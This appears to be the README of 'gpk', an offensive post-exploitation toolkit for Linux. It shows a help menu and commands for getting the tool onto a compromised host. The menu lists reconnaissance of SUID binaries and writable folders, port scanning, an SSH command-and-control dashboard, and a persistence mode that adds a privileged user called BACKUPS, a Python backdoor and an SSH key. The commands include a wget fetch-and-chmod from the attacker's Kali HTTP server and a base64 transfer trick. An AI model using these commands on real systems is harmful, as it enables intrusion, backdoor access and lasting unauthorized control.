wget -q https://raw.githubusercontent.com/h0ru/gpk/main/source/gpk -O gpk ; chmod +x gpk
[*] HELP MENU
[+] -h --help - HELP MENU (Show these help)
[+] -m - MACHINE INFORMATIONS (Show Hardware/System Infos)
[+] -ds - DEEP SEARCH (Show Tools, Crontab Files, SUID Binaries, Writable Folders)
[+] -n - NETWORK (Show Network Information and use Ping Sweep and Port Scan modes)
[+] -c2 - CHACAL C2 (Manage SSH Connections Through a Dashboard)
[+] -p - PERSISTENCE (Create a Privileged User Called BACKUPS, Create a Backdoor in Python3 and an SSH KEY)
(KALI)
python3 -m http.server 80
(TARGET)
wget ip/gpk -O gpk ; chmod +x gpk
(KALI)
cat gpk | base64 -w0
(TARGET)
nano gpk.b64 (paste the base64 gpk code)
base64 -d gpk.b64 > gpk ; chmod +x gpk